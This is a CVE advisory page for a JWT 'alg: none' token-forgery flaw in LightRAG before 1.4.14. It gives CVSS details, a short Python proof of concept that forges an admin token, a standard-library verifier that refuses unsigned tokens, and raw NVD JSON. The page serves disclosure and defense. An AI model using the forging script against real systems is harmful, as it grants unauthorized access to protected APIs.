Security Vulnerability Report
CVE-2026-39413 CVSS 4.2 MEDIUM

CVE-2026-39413

Published: 2026-04-08 20:16:26
Last Modified: 2026-04-22 16:16:58

Description

LightRAG provides simple and fast retrieval-augmented generation. Prior to 1.4.14, the LightRAG API is vulnerable to a JWT algorithm confusion attack where an attacker can forge tokens by specifying 'alg': 'none' in the JWT header. Since the jwt.decode() call does not explicitly deny the 'none' algorithm, a crafted token without a signature will be accepted as valid, leading to unauthorized access. This vulnerability is fixed in 1.4.14.

CVSS Details

CVSS Score: 4.2
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:N/A:N

These are the Secondary-source metrics. The Primary (NVD) assessment in the raw JSON below scores the same issue 6.5 MEDIUM with vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N, i.e. low attack complexity, low privileges and no user interaction; the weakness is classified as CWE-347 (Improper Verification of Cryptographic Signature).

Configurations (Affected Products)

cpe:2.3:a:hkuds:lightrag:*:*:*:*:*:*:*:* - VULNERABLE
LightRAG < 1.4.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import jwt
import datetime

# Target payload claiming to be an admin
payload = {
    'sub': 'admin',
    'role': 'administrator',
    'iat': datetime.datetime.utcnow(),
    'exp': datetime.datetime.utcnow() + datetime.timedelta(hours=1)
}

# Forge the token using the 'none' algorithm
# No secret key is required for the 'none' algorithm
malicious_token = jwt.encode(payload, key='', algorithm='none')
print(f"Forged Token: {malicious_token}")

# Usage example (in a real attack, send this token in the Authorization header)
# headers = {'Authorization': f'Bearer {malicious_token}'}
```
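The defender's side of the same issue, as an added example that is not LightRAG's or PyJWT's code: a small standard-library verifier whose accepted algorithm comes from server policy rather than from the token header, so an 'alg': 'none' token with an empty signature is refused before any signature logic runs. The HS256 allowlist and the demo secret are assumptions; with PyJWT the equivalent is passing an explicit `algorithms=[...]` list that excludes 'none' to `jwt.decode()`.

```python
import base64
import hashlib
import hmac
import json
import time

SECRET = b"demo-secret-not-for-production"  # constructed demo value (assumption)
ALLOWED_ALGS = {"HS256"}  # server policy: the only algorithm ever accepted

def _b64url_decode(segment: str) -> bytes:
    # JWT segments are unpadded base64url; restore padding before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def make_token(payload: dict, alg: str) -> str:
    """Build a sample token for the checks below; alg='none' gives an empty signature."""
    header = {"alg": alg, "typ": "JWT"}
    signing_input = ".".join(_b64url_encode(json.dumps(p).encode()) for p in (header, payload))
    if alg == "none":
        return signing_input + "."
    sig = hmac.new(SECRET, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url_encode(sig)

def decode_strict(token: str) -> dict:
    """Verify a JWT against the allowlist; raise ValueError on any failure.
    The algorithm comes from policy, not the header, so 'none' is refused early."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    head_b64, body_b64, sig_b64 = parts
    header = json.loads(_b64url_decode(head_b64))
    if not isinstance(header, dict) or header.get("alg") not in ALLOWED_ALGS:
        raise ValueError("algorithm not allowed")
    expected = hmac.new(SECRET, f"{head_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    payload = json.loads(_b64url_decode(body_b64))
    if "exp" in payload and payload["exp"] <= time.time():
        raise ValueError("token expired")
    return payload

def is_valid(token: str) -> bool:
    # Convenience wrapper: True only when decode_strict accepts the token.
    try:
        decode_strict(token)
        return True
    except ValueError:
        return False
```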

References

https://github.com/HKUDS/LightRAG/security/advisories/GHSA-8ffj-4hx4-9pgf (Exploit, Mitigation, Vendor Advisory)
https://github.com/github/advisory-database/issues/7373

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-39413",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-08T20:16:25.877",
    "lastModified": "2026-04-22T16:16:58.387",
    "vulnStatus": "Modified",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "LightRAG provides simple and fast retrieval-augmented generation. Prior to 1.4.14, the LightRAG API is vulnerable to a JWT algorithm confusion attack where an attacker can forge tokens by specifying 'alg': 'none' in the JWT header. Since the jwt.decode() call does not explicitly deny the 'none' algorithm, a crafted token without a signature will be accepted as valid, leading to unauthorized access. This vulnerability is fixed in 1.4.14."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:N/A:N",
            "baseScore": 4.2,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "HIGH",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 0.5,
          "impactScore": 3.6
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-347"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:hkuds:lightrag:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "1.4.14",
                "matchCriteriaId": "80A2BB57-B14C-4542-8F7F-D0D6F20AFC31"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/HKUDS/LightRAG/security/advisories/GHSA-8ffj-4hx4-9pgf",
        "source": "[email protected]",
        "tags": ["Exploit", "Mitigation", "Vendor Advisory"]
      },
      {
        "url": "https://github.com/github/advisory-database/issues/7373",
        "source": "af854a3a-2127-422b-91ae-364da2661108"
      }
    ]
  }
}
```